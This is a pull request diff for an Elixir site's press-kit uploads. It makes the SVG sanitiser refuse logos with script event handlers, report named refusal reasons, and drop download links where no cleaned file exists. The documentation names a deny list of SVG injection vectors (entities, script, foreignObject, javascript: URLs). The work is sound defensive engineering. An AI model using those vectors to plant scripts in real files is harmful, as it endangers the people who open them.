### PR TITLE
Refuse a press logo that carries a script, and name every refusal

### DIFF
--- a/docs/architecture/images.md
+++ b/docs/architecture/images.md
@@ -149,9 +149,25 @@ download rather than changing a brand mark. Measured on five exports — Inkscap
 1,381 → 410 bytes, Illustrator 555 → 461, Figma and two hand-written marks byte
 for byte unchanged — all five identical pixels.
 
-*The renderer is what is protected, not the browser.* No SVG is ever rendered by
-a browser on our origin, so
-this is not an XSS question: the XML parser runs on our machine, on markup a
+*The one thing it refuses rather than removes is a script* (issue #2181). An
+`on…` attribute is an event handler, and a handler is not a trail: removing it
+would change what the member's file does, and the pixel comparison above cannot
+see it, so it could not have kept that edit honest. It is also the one place
+where the person protected is the **reader** rather than our renderer — the file
+leaves as an attachment and never runs here, but whoever saves it opens a
+document with a script in it. `SvgStrip` recognises it on the **parsed attribute
+name**, never a pattern over the document, so the same letters in a `<desc>`
+stay prose; and because `clean/1` runs again on every download, a logo stored
+before the cleaning stops being handed out too. That refusal and two others a
+member can act on — an embedded file no stripper can take apart (a web font,
+which Figma and Illustrator both embed by default), a `data:` run nothing can
+decode — reach the editor by name (`:svg_event_handler`, `:svg_embedded_file`,
+`:svg_unreadable_data`) rather than as "That file could not be processed"
+(issue #2182); everything structural stays `:unclean`.
+
+*The renderer is what the gate below protects, not the browser.* No SVG is ever
+rendered by a browser on our origin, so
+that gate is not an XSS question: the XML parser runs on our machine, on markup a
 member — or a remote server — chose, and it will expand entities (XXE, billion
 laughs) and follow references while rendering. The gate refuses a DOCTYPE,
 entity, `<script>`, `<foreignObject>`, `javascript:`, `@import`, or a `href`
@@ -1025,7 +1041,13 @@ bytes for a photo, most of the file for a logo whose editor filled it with its
 own trail (#2145); and a **vector** claims no pixel size, since the stored
 `width`/`height` are the rasterisation's — the PNG rendering offered beside it —
 so they read as `PNG 1600 × 533` after the SVG's own byte count. A size that
-cannot be measured is left out; that download 404s anyway.
+cannot be measured is left out, and since issue #2182 so is the **link** beside
+it: `PressKit.download_offer/1` answers the address and the length together, so
+a Download button is drawn only while there is a file behind it — on the page,
+in the lightbox, in the schema.org block, in the agent documents and in the GDPR
+export. The PNG rendering offered beside a vector keeps its own link either way,
+because it is a rasterisation of the upload and no verdict on the markup reaches
+it.
 A logo is drawn on **white in both themes**, because
 nothing stores which ground a variant was made for; the section page repeats it
 on a dark ground beside it, so a reversed mark is visible somewhere. The

--- a/lib/vutuv/export.ex
+++ b/lib/vutuv/export.ex
@@ -239,9 +239,21 @@ defmodule Vutuv.Export do
         # JSON is downloaded and kept, so an address that only resolves against
         # a host the reader has to remember is not an address. The job export
         # builds its URLs the same way.
-        download_url: Endpoint.url() <> PressKit.download_url(image)
+        #
+        # And absent where there is no file to fetch (issue #2182): an export is
+        # read months later, by a member or by whatever they hand it to, and an
+        # address in it that answers 404 is the one thing worse than a missing
+        # key.
+        download_url: press_download_url(image)
       }
     end)
+  end
+
+  defp press_download_url(image) do
+    case PressKit.download_offer(image) do
+      nil -> nil
+      download -> Endpoint.url() <> download.url
+    end
   end
 
   # Posts by accounts the member follows and replies written under vutuv posts,

--- a/lib/vutuv/press_kit.ex
+++ b/lib/vutuv/press_kit.ex
@@ -699,6 +699,29 @@ defmodule Vutuv.PressKit do
   """
   def download_bytes(%Image{} = image), do: byte_size_of(PressKitStore.download_file(image))
 
+  @doc """
+  The download this picture can really hand over — `%{url: …, bytes: …}` — or
+  `nil` when there is nothing to hand over (issue #2182).
+
+  **One owner for the pair**, because the address and the size answer the same
+  question and four surfaces were asking them apart: the section page, the
+  schema.org block, the agent documents and the personal-data export each named
+  an address while the size beside it quietly went missing, so a journalist
+  pressed Download and got a 404. Ask this once per picture and carry the
+  answer.
+
+  Carrying it is not politeness. Measuring is two syscalls for a picture whose
+  cleaned copy is cached, and for one the strippers **refuse** it is the whole
+  derivation again — a document rewrite plus the two rasterisations that prove
+  it — cached nowhere, on a page a crawler can reach fifteen pictures at a time.
+  """
+  def download_offer(%Image{} = image) do
+    case download_bytes(image) do
+      nil -> nil
+      bytes -> %{url: download_url(image), bytes: bytes}
+    end
+  end
+
   defp byte_size_of({path, _ext}) do
     case File.stat(path) do
       {:ok, %File.Stat{size: size}} -> size
@@ -835,6 +858,11 @@ defmodule Vutuv.PressKit do
   `{:error, :too_large}`, `{:error, :too_many}` or `{:error, :invalid_file}`
   for the three the form cannot see. The authorization is asked **first**, so a
   refused upload never so much as measures the file.
+
+  Three refusals arrive by their own name instead of `:invalid_file`, because a
+  member can do something about each (issue #2182, and #2181 for the first):
+  `:svg_event_handler`, `:svg_embedded_file` and `:svg_unreadable_data` — see
+  `Vutuv.Uploads.SvgStrip`, which is where a vector logo is judged.
 
   `opts` takes `:position`, **the slot this picture was picked for** — which is
   not the same as the end of the shelf whenever several files are in flight at

--- a/lib/vutuv/uploaders/post_image_store.ex
+++ b/lib/vutuv/uploaders/post_image_store.ex
@@ -377,7 +377,7 @@ defmodule Vutuv.PostImageStore do
   defp download_file(%PostImage{download_exact: true}, original, ext), do: {original, ext}
 
   defp download_file(%PostImage{token: token}, original, ext),
-    do: Originals.cleaned_copy(storage_dir(token), original, ext)
+    do: Originals.cleaned_file(storage_dir(token), original, ext)
 
   # The full-resolution cropped download, derived once and cached in the
   # private originals tree (like the cleaned copy). JPEG on purpose: it is a

--- a/lib/vutuv/uploaders/press_kit_store.ex
+++ b/lib/vutuv/uploaders/press_kit_store.ex
@@ -129,17 +129,26 @@ defmodule Vutuv.PressKitStore do
   # than stored behind a download link that 404s and a size nobody can state.
   # `delete/1` rather than `store_upload/4`'s own `File.rm_rf(dir)`, which knows
   # only the served tree — this is the paired teardown, and it is idempotent.
+  #
+  # The refusal carries **why** (issue #2182): the two a member can act on — an
+  # embedded file nothing can clean, a `data:` run nothing can read — arrive at
+  # the editor as their own sentence instead of "that file could not be
+  # processed", which told somebody looking at a Figma export nothing at all.
+  # `{:refused, reason}` is how `Vutuv.Uploads.store_upload/4` tells a reason
+  # meant for a member from the ones that are ours.
   defp stored(rotated, path, token) do
-    if cleaned_download(token) do
-      {:ok,
-       %{
-         width: Image.width(rotated),
-         height: Image.height(rotated),
-         size_bytes: File.stat!(path).size
-       }}
-    else
-      delete(token)
-      {:error, :uncleanable}
+    case cleaned_download(token) do
+      {:ok, _file} ->
+        {:ok,
+         %{
+           width: Image.width(rotated),
+           height: Image.height(rotated),
+           size_bytes: File.stat!(path).size
+         }}
+
+      {:error, reason} ->
+        delete(token)
+        {:error, {:refused, reason}}
     end
   end
 
@@ -257,12 +266,18 @@ defmodule Vutuv.PressKitStore do
   download is always clean" is a promise, and a promise with no second line is a
   comment.
   """
-  def download_file(%ImageRow{token: token}), do: cleaned_download(token)
+  def download_file(%ImageRow{token: token}) do
+    case cleaned_download(token) do
+      {:ok, file} -> file
+      {:error, _reason} -> nil
+    end
+  end
 
-  # Also the upload's own warm-up, which has no row yet.
+  # Also the upload's own gate, which has no row yet — and the one caller that
+  # wants the refusal's reason rather than only its absence.
   defp cleaned_download(token) do
     case Originals.path(storage_dir(token)) do
-      nil -> nil
+      nil -> {:error, :unclean}
       original -> Originals.cleaned_copy(storage_dir(token), original, Path.extname(original))
     end
   end
@@ -293,7 +308,7 @@ defmodule Vutuv.PressKitStore do
   # A logo already stored as PNG is handed over as its cleaned self: re-encoding
   # a raster that is already the right format would only lose pixels.
   defp png_download(original, ".png" = ext, token),
-    do: Originals.cleaned_copy(storage_dir(token), original, ext)
+    do: Originals.cleaned_file(storage_dir(token), original, ext)
 
   defp png_download(original, _vector, token) do
     dest = Path.join(Originals.dir(storage_dir(token)), "download.png")

--- a/lib/vutuv/uploads.ex
+++ b/lib/vutuv/uploads.ex
@@ -941,6 +941,15 @@ defmodule Vutuv.Uploads do
   extension — to write the derived versions and the original. `{:ok, meta}`
   comes back with the upload's `content_type` merged in; `{:error, _}`
   removes the fresh `dir` again and collapses to `{:error, :invalid_file}`.
+
+  A write function that has a reason **the member can act on** says so as
+  `{:error, {:refused, reason}}`, and that reason is the one thing that survives
+  the collapse (issue #2182). The wrapper is the whole point: every other
+  refusal here is ours rather than theirs — a decoder that gave up, a pixel
+  budget, a rotation — and a surface handing those out by name would be reading
+  the member our implementation notes. So a new named refusal is a deliberate
+  act at the place that raises it, never a reason that leaks out because nothing
+  caught it.
   """
   def store_upload(filename, whitelist, dir, write_fun) do
     if valid_extension?(filename, whitelist) do
@@ -950,6 +959,10 @@ defmodule Vutuv.Uploads do
       case write_fun.(ext) do
         {:ok, meta} ->
           {:ok, Map.merge(meta, %{content_type: MIME.from_path(filename)})}
+
+        {:error, {:refused, reason}} ->
+          File.rm_rf(dir)
+          {:error, reason}
 
         {:error, _reason} ->
           File.rm_rf(dir)

--- a/lib/vutuv/uploads/originals.ex
+++ b/lib/vutuv/uploads/originals.ex
@@ -93,9 +93,9 @@ defmodule Vutuv.Uploads.Originals do
   end
 
   @doc """
-  The **cleaned copy** of a kept original, as `{path, ext}`: the same picture
-  with every metadata block removed, derived once on first request and cached
-  beside the original as `cleaned<ext>`.
+  The **cleaned copy** of a kept original, as `{:ok, {path, ext}}`: the same
+  picture with every metadata block removed, derived once on first request and
+  cached beside the original as `cleaned<ext>`.
 
   Two strippers answer for it — `Vutuv.Uploads.MetadataStrip` for a container,
   `Vutuv.Uploads.SvgStrip` for a vector (issue #2145) — and the **bytes** pick
@@ -105,10 +105,14 @@ defmodule Vutuv.Uploads.Originals do
   here too.
 
   **It fails closed.** A file neither stripper can take apart with certainty
-  yields `nil` rather than the untouched original, because the whole point of
-  offering a cleaned copy is the promise that the file carries nothing but the
-  picture, and falling back to the upload would break exactly that promise while
-  looking like it worked.
+  yields `{:error, reason}` rather than the untouched original, because the whole
+  point of offering a cleaned copy is the promise that the file carries nothing
+  but the picture, and falling back to the upload would break exactly that
+  promise while looking like it worked. The `reason` is the stripper's own word
+  (issue #2182), carried out rather than derived a second time: three of
+  `SvgStrip`'s are sentences a member can act on, and a refusal that had to be
+  re-measured to be explained would be a second strip of a file we have just
+  established cannot be stripped.
 
   Written here rather than in each store because both places that hand a
   full-resolution file over make the same promise — the post photo's
@@ -121,7 +125,7 @@ defmodule Vutuv.Uploads.Originals do
 
     cond do
       File.exists?(dest) ->
-        {dest, ext}
+        {:ok, {dest, ext}}
 
       # A fast path only: neither stripper is asked what the name says, but
       # reading a 30 MB press photo to find out nothing can clean it is what
@@ -130,16 +134,30 @@ defmodule Vutuv.Uploads.Originals do
         write_cleaned(original, dest, ext)
 
       true ->
-        nil
+        {:error, :unclean}
+    end
+  end
+
+  @doc """
+  `cleaned_copy/3` for a caller that only wants the file: `{path, ext}` or `nil`.
+  Every read path takes this one — a download offers the file or offers nothing,
+  and the reason is the upload's business.
+  """
+  def cleaned_file(storage_dir, original, ext) do
+    case cleaned_copy(storage_dir, original, ext) do
+      {:ok, file} -> file
+      {:error, _reason} -> nil
     end
   end
 
   defp write_cleaned(original, dest, ext) do
     with {:ok, bytes} <- File.read(original),
          {:ok, cleaned} <- strip(bytes) do
-      {publish(dest, cleaned), ext}
+      {:ok, {publish(dest, cleaned), ext}}
     else
-      _unclean -> nil
+      {:error, reason} -> {:error, reason}
+      # `File.read/1`'s own posix atom, which is ours rather than the member's.
+      _unreadable -> {:error, :unclean}
     end
   end
 
@@ -148,7 +166,7 @@ defmodule Vutuv.Uploads.Originals do
       SvgStrip.clean(bytes)
     else
       case MetadataStrip.strip_binary(bytes) do
-        :unsupported -> :error
+        :unsupported -> {:error, :unclean}
         cleaned -> {:ok, cleaned}
       end
     end

--- a/lib/vutuv/uploads/spec.ex
+++ b/lib/vutuv/uploads/spec.ex
@@ -401,8 +401,14 @@ defmodule Vutuv.Uploads.Spec do
   # readable text, must carry none of `@svg_forbidden`, and may not point a
   # reference at the network or the disk.
   #
-  # That download is also why the vetting matters twice over: the markup a
-  # journalist saves is the markup this predicate cleared, unchanged.
+  # An **`on…` event handler** is deliberately not on that list, and issue #2181
+  # is why it is worth saying so. A handler is harmless to this parser and
+  # dangerous to the person who saves the file, which makes it a question about
+  # the file that leaves rather than about the renderer that runs here — so it
+  # is `Vutuv.Uploads.SvgStrip` that refuses it, on the parsed attribute name,
+  # where a regex over a whole document would read the same letters in a
+  # `<desc>` as a script. That module runs at the upload and again at every
+  # download, so a file stored before it existed stops being handed out too.
   #
   # Deliberately narrower than "contains no URL". Every SVG an editor exports
   # names URLs that are never fetched — the `xmlns` namespaces, and the RDF /

--- a/lib/vutuv/uploads/svg_strip.ex
+++ b/lib/vutuv/uploads/svg_strip.ex
@@ -128,6 +128,9 @@ defmodule Vutuv.Uploads.SvgStrip do
       # different pixels; neither is anything the member can do something
       # about, so both take the structural word.
       false -> {:error, :unclean}
+      # A delimiter the document never closed, which `split_on/2` reports as a
+      # bare atom for a reason worth reading there.
+      :unterminated -> {:error, :unclean}
       {:error, _reason} = refusal -> refusal
     end
   end
@@ -518,10 +521,16 @@ defmodule Vutuv.Uploads.SvgStrip do
 
   ## Byte helpers
 
+  # The failure is an atom and must stay one: every caller reads the answer as
+  # `with {before, rest} <- split_on(…)`, and a two-element refusal tuple
+  # satisfies that pattern — the scan would then carry the refusal's own atom on
+  # as if it were the rest of the document and raise `ArgumentError` deep in a
+  # byte helper instead of refusing the file. `clean/1` turns it into a refusal
+  # where every other one is made.
   defp split_on(binary, delimiter) do
     case :binary.split(binary, delimiter) do
       [before, rest] -> {before, rest}
-      [_only] -> {:error, :unclean}
+      [_only] -> :unterminated
     end
   end
 

--- a/lib/vutuv/uploads/svg_strip.ex
+++ b/lib/vutuv/uploads/svg_strip.ex
@@ -48,16 +48,38 @@ defmodule Vutuv.Uploads.SvgStrip do
   `<?xml-stylesheet?>` is a place an editor can park a photograph, and a
   photograph is exactly what carries the serial.
 
+  **What it refuses rather than removes.** An `on…` attribute is a **script
+  handler** (issue #2181), and a script is the one thing here that is not a
+  trail: removing it would change what the member's file does, and leaving it
+  would hand a journalist a document that runs code the moment they open it —
+  our own origin never renders one (the download leaves as an attachment under
+  `nosniff`), but the person who saves it opens a standalone `.svg`, and that is
+  a document with a script in it. So the file is refused, which is also the
+  answer the member can act on: their export carries interactivity a logo has no
+  use for. The check reads attribute **names off the parser**, never a pattern
+  over the whole document, so the same letters inside a `<title>` or a `<desc>`
+  are prose; only an attribute in **no** namespace counts, because a prefixed
+  one binds no event anywhere and leaves with its namespace in any case.
+
   **It fails closed**, like the stripper beside it: markup this module cannot
   take apart with certainty — a DOCTYPE, a tag it cannot parse, a `data:` URI it
-  cannot clean — yields `:error`, and the caller then offers no download at all
-  rather than the untouched file.
+  cannot clean — yields `{:error, reason}`, and the caller then offers no
+  download at all rather than the untouched file.
+
+  The `reason` is one word, and three of them are named so a surface can say
+  what happened instead of "that file could not be processed" (issue #2182):
+  `:svg_event_handler` above, `:svg_embedded_file` for a payload no container
+  stripper can take apart (a webfont, an SVG inside the SVG) and
+  `:svg_unreadable_data` for a `data:` run this module cannot decode at all —
+  which is a percent-encoded payload **and** a description that merely reads
+  like one, since nothing can tell those apart from outside the author's head.
+  Everything structural is `:unclean`.
 
   And because an argument about what a renderer ignores is still an argument,
   `clean/1` **checks it**: the file that comes back is rasterised beside the file
   that went in (`Vutuv.Uploads.Spec.open_rotated_binary/1`, the same librsvg the
   preview is drawn with) and the two pixel buffers must be identical, or the
-  answer is `:error`. A namespace this module got wrong therefore costs a
+  answer is a refusal. A namespace this module got wrong therefore costs a
   download, never a changed logo.
   """
 
@@ -93,7 +115,8 @@ defmodule Vutuv.Uploads.SvgStrip do
 
   @doc """
   The markup with every non-rendering trail removed, as `{:ok, binary}`, or
-  `:error` for anything this module cannot clean *and* prove unchanged.
+  `{:error, reason}` for anything this module cannot clean *and* prove
+  unchanged — see the moduledoc for the four reasons.
   """
   def clean(markup) when is_binary(markup) do
     with true <- svg?(markup),
@@ -101,11 +124,15 @@ defmodule Vutuv.Uploads.SvgStrip do
          true <- renders_alike?(markup, cleaned) do
       {:ok, cleaned}
     else
-      _ -> :error
+      # `false` from either predicate — not an SVG, or the rewrite drew
+      # different pixels; neither is anything the member can do something
+      # about, so both take the structural word.
+      false -> {:error, :unclean}
+      {:error, _reason} = refusal -> refusal
     end
   end
 
-  def clean(_markup), do: :error
+  def clean(_markup), do: {:error, :unclean}
 
   @doc """
   Whether two documents draw exactly the same pixels — the proof `clean/1` makes
@@ -158,10 +185,8 @@ defmodule Vutuv.Uploads.SvgStrip do
   # that keeps bytes belongs on that list.
 
   defp rewrite(markup) do
-    case scan(markup, [@root_scope], []) do
-      {:ok, parts} -> {:ok, parts |> Enum.reverse() |> IO.iodata_to_binary()}
-      :error -> :error
-    end
+    with {:ok, parts} <- scan(markup, [@root_scope], []),
+         do: {:ok, parts |> Enum.reverse() |> IO.iodata_to_binary()}
   end
 
   defp scan(<<>>, _scopes, acc), do: {:ok, acc}
@@ -180,7 +205,7 @@ defmodule Vutuv.Uploads.SvgStrip do
   # A declaration is only ever a DOCTYPE here, and a DOCTYPE is where an entity
   # is declared. The upload gate already refuses one (`Spec.open_rotated/1`);
   # this is the second line, because a stored file is never re-vetted.
-  defp scan(<<"<!", _rest::binary>>, _scopes, _acc), do: :error
+  defp scan(<<"<!", _rest::binary>>, _scopes, _acc), do: {:error, :unclean}
 
   defp scan(<<"<?", rest::binary>>, scopes, acc) do
     with {body, tail} <- split_on(rest, "?>"),
@@ -194,7 +219,7 @@ defmodule Vutuv.Uploads.SvgStrip do
          do: scan(tail, outer, [">", name, "</" | acc])
   end
 
-  defp scan(<<"</", _rest::binary>>, _scopes, _acc), do: :error
+  defp scan(<<"</", _rest::binary>>, _scopes, _acc), do: {:error, :unclean}
 
   defp scan(<<"<", rest::binary>>, scopes, acc) do
     with {:ok, tag} <- parse_tag(rest), do: emit_tag(tag, scopes, acc)
@@ -230,8 +255,8 @@ defmodule Vutuv.Uploads.SvgStrip do
         inner = if tag.empty?, do: scopes, else: [scope | scopes]
         scan(tag.tail, inner, [close, tag.trailing, kept, tag.name, "<" | acc])
 
-      :error ->
-        :error
+      {:error, _reason} = refusal ->
+        refusal
     end
   end
 
@@ -244,10 +269,14 @@ defmodule Vutuv.Uploads.SvgStrip do
   defp attributes_iodata([], _scope, acc), do: {:ok, Enum.reverse(acc)}
 
   defp attributes_iodata([attribute | rest], scope, acc) do
-    if keep_attribute?(attribute.name, scope) do
-      keep_attribute(attribute, rest, scope, acc)
-    else
-      attributes_iodata(rest, scope, acc)
+    case split_name(attribute.name) do
+      {nil, <<o, n, _rest::binary>>} when o in ~c"oO" and n in ~c"nN" ->
+        {:error, :svg_event_handler}
+
+      split ->
+        if keep_attribute?(split, scope),
+          do: keep_attribute(attribute, rest, scope, acc),
+          else: attributes_iodata(rest, scope, acc)
     end
   end
 
@@ -257,8 +286,8 @@ defmodule Vutuv.Uploads.SvgStrip do
         part = [attribute.space, attribute.name, attribute.separator, value, attribute.quoted]
         attributes_iodata(rest, scope, [part | acc])
 
-      :error ->
-        :error
+      {:error, _reason} = refusal ->
+        refusal
     end
   end
 
@@ -297,13 +326,17 @@ defmodule Vutuv.Uploads.SvgStrip do
 
   # An unprefixed attribute is in no namespace at all — every SVG geometry and
   # presentation attribute is one — so it stays. `xmlns:p` leaves when `p` does.
-  defp keep_attribute?(name, scope) do
-    case split_name(name) do
-      {"xmlns", prefix} -> Map.get(scope, prefix) in @keep_ns
-      {nil, _local} -> true
-      {prefix, _local} -> Map.get(scope, prefix) in @keep_ns
-    end
-  end
+  # It takes the already-split name, because the clause above it has to look at
+  # the local part anyway (issue #2181): a script handler is the one attribute
+  # neither kept nor dropped but refused, and it is recognised on the **parsed**
+  # name, so the same letters in a text node stay text. Unprefixed only — `on…`
+  # binds an event in no namespace, and a prefixed one leaves with its namespace
+  # in any case. `on` plus one more character is the whole rule: no SVG
+  # attribute begins with those two letters without being a handler, and a list
+  # of the handlers there happen to be today would be a list to keep.
+  defp keep_attribute?({"xmlns", prefix}, scope), do: Map.get(scope, prefix) in @keep_ns
+  defp keep_attribute?({nil, _local}, _scope), do: true
+  defp keep_attribute?({prefix, _local}, scope), do: Map.get(scope, prefix) in @keep_ns
 
   defp split_name(name) do
     case :binary.split(name, ":") do
@@ -333,11 +366,11 @@ defmodule Vutuv.Uploads.SvgStrip do
 
     case cleaned_data_uri(slice(text, media), slice(text, payload)) do
       {:ok, replacement} -> {:cont, {start + length, [replacement, head | acc]}}
-      :error -> {:halt, :error}
+      {:error, _reason} = refusal -> {:halt, refusal}
     end
   end
 
-  defp finish_data_uris(:error, _text), do: :error
+  defp finish_data_uris({:error, _reason} = refusal, _text), do: refusal
 
   # Iodata, not a binary: every caller drops the answer straight into the
   # accumulator `rewrite/1` flattens once, so a binary here would be a second
@@ -350,13 +383,22 @@ defmodule Vutuv.Uploads.SvgStrip do
   # Only base64, and only a container `MetadataStrip` can take apart. A
   # percent-encoded payload, an embedded font, an SVG inside the SVG: none of
   # them can be proven clean, so the file they sit in is not handed out either.
+  #
+  # The two refusals are told apart because the member can act on each of them
+  # differently (issue #2182): a payload we decoded and could not clean is a
+  # **file** in the logo — a webfont, almost always — while one we could not
+  # decode at all may be no file whatsoever, just a description that reads like
+  # one. Nothing here can tell those two apart, and neither can the member
+  # without being told which words we are reading.
   defp cleaned_data_uri(media, payload) do
     with true <- String.ends_with?(String.downcase(media), ";base64"),
-         {:ok, raw} <- Base.decode64(payload, ignore: :whitespace),
-         bytes when is_binary(bytes) <- MetadataStrip.strip_binary(raw) do
-      {:ok, ["data:", media, ",", Base.encode64(bytes)]}
+         {:ok, raw} <- Base.decode64(payload, ignore: :whitespace) do
+      case MetadataStrip.strip_binary(raw) do
+        bytes when is_binary(bytes) -> {:ok, ["data:", media, ",", Base.encode64(bytes)]}
+        _unsupported -> {:error, :svg_embedded_file}
+      end
     else
-      _ -> :error
+      _undecodable -> {:error, :svg_unreadable_data}
     end
   end
 
@@ -372,7 +414,7 @@ defmodule Vutuv.Uploads.SvgStrip do
   defp skip_element(<<"<!--", rest::binary>>, depth), do: skip_past(rest, "-->", depth)
   defp skip_element(<<"<![CDATA[", rest::binary>>, depth), do: skip_past(rest, "]]>", depth)
   defp skip_element(<<"<?", rest::binary>>, depth), do: skip_past(rest, "?>", depth)
-  defp skip_element(<<"<!", _rest::binary>>, _depth), do: :error
+  defp skip_element(<<"<!", _rest::binary>>, _depth), do: {:error, :unclean}
 
   defp skip_element(<<"</", rest::binary>>, depth) do
     with {_name, tail} <- split_on(rest, ">") do
@@ -384,7 +426,7 @@ defmodule Vutuv.Uploads.SvgStrip do
     case skip_tag(rest, nil) do
       {:ok, :empty, tail} -> skip_element(tail, depth)
       {:ok, :open, tail} -> skip_element(tail, depth + 1)
-      :error -> :error
+      {:error, _reason} = refusal -> refusal
     end
   end
 
@@ -396,7 +438,7 @@ defmodule Vutuv.Uploads.SvgStrip do
         skip_element(binary_part(binary, position, byte_size(binary) - position), depth)
 
       :nomatch ->
-        :error
+        {:error, :unclean}
     end
   end
 
@@ -404,7 +446,7 @@ defmodule Vutuv.Uploads.SvgStrip do
     with {_body, tail} <- split_on(rest, delimiter), do: skip_element(tail, depth)
   end
 
-  defp skip_tag(<<>>, _quoted), do: :error
+  defp skip_tag(<<>>, _quoted), do: {:error, :unclean}
   defp skip_tag(<<char, rest::binary>>, nil) when char in ~c"\"'", do: skip_tag(rest, char)
   defp skip_tag(<<char, rest::binary>>, quoted) when char == quoted, do: skip_tag(rest, nil)
   defp skip_tag(<<"/>", rest::binary>>, nil), do: {:ok, :empty, rest}
@@ -424,7 +466,7 @@ defmodule Vutuv.Uploads.SvgStrip do
          {:ok, attributes, trailing, empty?, tail} <- parse_attributes(rest, []) do
       {:ok, %{name: name, attributes: attributes, trailing: trailing, empty?: empty?, tail: tail}}
     else
-      _ -> :error
+      _ -> {:error, :unclean}
     end
   end
 
@@ -434,7 +476,7 @@ defmodule Vutuv.Uploads.SvgStrip do
     case rest do
       <<"/>", tail::binary>> -> {:ok, Enum.reverse(acc), space, true, tail}
       <<">", tail::binary>> -> {:ok, Enum.reverse(acc), space, false, tail}
-      <<>> -> :error
+      <<>> -> {:error, :unclean}
       _attribute -> parse_attribute(rest, space, acc)
     end
   end
@@ -448,7 +490,7 @@ defmodule Vutuv.Uploads.SvgStrip do
         parse_value(space, name, before_equals, value, acc)
 
       _malformed ->
-        :error
+        {:error, :unclean}
     end
   end
 
@@ -467,19 +509,19 @@ defmodule Vutuv.Uploads.SvgStrip do
 
       parse_attributes(tail, [attribute | acc])
     else
-      _ -> :error
+      _ -> {:error, :unclean}
     end
   end
 
   defp take_quote(<<char, rest::binary>>) when char in ~c"\"'", do: {:ok, <<char>>, rest}
-  defp take_quote(_binary), do: :error
+  defp take_quote(_binary), do: {:error, :unclean}
 
   ## Byte helpers
 
   defp split_on(binary, delimiter) do
     case :binary.split(binary, delimiter) do
       [before, rest] -> {before, rest}
-      [_only] -> :error
+      [_only] -> {:error, :unclean}
     end
   end
 

--- a/lib/vutuv_web/agent_docs/markdown.ex
+++ b/lib/vutuv_web/agent_docs/markdown.ex
@@ -1554,9 +1554,13 @@ defmodule VutuvWeb.AgentDocs.Markdown do
   # out again.
   defp bio_block(bio), do: "### #{bio.label}\n\n#{bio.text}"
 
+  # The label is a **link only while there is a file behind it** (issue #2182):
+  # a picture whose download cannot be handed over carries no `download_url`,
+  # the way it already carries no `size_bytes`, and an agent reading this
+  # document fetches every address in it.
   defp press_picture_line(picture) do
     [
-      "- " <> md_link(picture.label, picture.download_url),
+      "- " <> press_picture_label(picture),
       picture[:credit] && "  - " <> gettext("Credit: %{credit}", credit: picture.credit),
       "  - " <> press_picture_size(picture),
       picture[:png_download_url] &&
@@ -1567,6 +1571,9 @@ defmodule VutuvWeb.AgentDocs.Markdown do
     |> Enum.join("\n")
   end
 
+  defp press_picture_label(%{download_url: url} = picture), do: md_link(picture.label, url)
+  defp press_picture_label(picture), do: md_text(picture.label)
+
   @doc false
   # The facts that decide whether a journalist downloads a picture, from the
   # fields both renderers already hold — the doc map carries the numbers, not a
@@ -1576,7 +1583,7 @@ defmodule VutuvWeb.AgentDocs.Markdown do
   # are one file's, while a vector hands over an SVG that has no pixel size and
   # offers a PNG rendering that does — so the doc map carries the second file's
   # dimensions under their own keys and this labels them. Same line the page's
-  # own `PressKitComponents.facts_line/1` draws.
+  # own `PressKitComponents.facts_line/2` draws.
   def press_picture_size(picture) do
     [
       picture[:width] && picture[:height] && UI.dimensions(picture.width, picture.height),

--- a/lib/vutuv_web/agent_docs/press_kit_doc.ex
+++ b/lib/vutuv_web/agent_docs/press_kit_doc.ex
@@ -81,6 +81,10 @@ defmodule VutuvWeb.AgentDocs.PressKitDoc do
   the press page.
   """
   def entry(%Image{} = image) do
+    # Once per picture: the address and the length are one answer, and for a
+    # file the strippers refuse, asking twice means stripping it twice.
+    download = PressKit.download_offer(image)
+
     %{
       id: image.id,
       # A picture whose owner typed no label still has to be called something,
@@ -95,10 +99,14 @@ defmodule VutuvWeb.AgentDocs.PressKitDoc do
       credit: image.credit,
       content_type: image.content_type,
       # The bytes the download really hands over, not the upload's length: a
-      # photo is stripped of its metadata on the way out (issue #2140).
-      size_bytes: PressKit.download_bytes(image),
+      # photo is stripped of its metadata on the way out (issue #2140) — and
+      # `nil` where nothing can be handed over at all, which is what drops the
+      # address beside it (issue #2182). An agent reading this document goes and
+      # fetches every URL in it, so naming one that answers 404 is worse here
+      # than on the page, where at least a person can shrug.
+      size_bytes: download && download.bytes,
       preview_url: AgentDocs.abs_url(PressKit.url(image, "large")),
-      download_url: AgentDocs.abs_url(PressKit.download_url(image)),
+      download_url: download && AgentDocs.abs_url(download.url),
       # Only a vector logo has one; a photo's download is already the file
       # itself, and an absent fact is no key at all rather than null.
       png_download_url: png_url(image)
@@ -118,7 +126,9 @@ defmodule VutuvWeb.AgentDocs.PressKitDoc do
   end
 
   # The same question `pixel_size/1` asks, so the two keys travel together: an
-  # entry carries `png_width`/`png_height` exactly when it carries the PNG.
+  # entry carries `png_width`/`png_height` exactly when it carries the PNG. The
+  # PNG is not gated on the cleaner the way the vector above is — it is a
+  # rasterisation of the same upload, so no verdict on the markup reaches it.
   defp png_url(%Image{} = image),
     do: if(PressKit.vector?(image), do: AgentDocs.abs_url(PressKit.png_download_url(image)))
 end

--- a/lib/vutuv_web/agent_docs/text.ex
+++ b/lib/vutuv_web/agent_docs/text.ex
@@ -988,7 +988,9 @@ defmodule VutuvWeb.AgentDocs.Text do
   defp press_picture_lines(picture) do
     [
       "- " <> picture.label,
-      "  " <> picture.download_url,
+      # No line at all for a file that cannot be handed over (issue #2182), the
+      # way there is already no size for it.
+      picture[:download_url] && "  " <> picture.download_url,
       picture[:png_download_url] && "  " <> picture.png_download_url,
       picture[:credit] && "  " <> gettext("Credit: %{credit}", credit: picture.credit),
       "  " <> Markdown.press_picture_size(picture),

--- a/lib/vutuv_web/components/press_kit_components.ex
+++ b/lib/vutuv_web/components/press_kit_components.ex
@@ -331,8 +331,8 @@ defmodule VutuvWeb.PressKitComponents do
         <.press_tile image={@view.image} held={@view.held} class="block h-auto w-full" />
       </a>
 
-      <.press_meta image={@view.image} report={@view.report} />
-      <.press_download :if={@view.photo} href={PressKit.download_url(@view.image)}>
+      <.press_meta image={@view.image} download={@view.download} report={@view.report} />
+      <.press_download :if={@view.download} href={@view.download.url}>
         {gettext("Download photo")}
       </.press_download>
     </li>
@@ -373,10 +373,16 @@ defmodule VutuvWeb.PressKitComponents do
         {variant_label(@view.image)}
       </p>
 
-      <.press_meta image={@view.image} report={@view.report} />
+      <.press_meta image={@view.image} download={@view.download} report={@view.report} />
 
+      <%!-- The file's own link is drawn only while there is a file (issue
+      #2182), which is the same answer the size beside it already gives: a logo
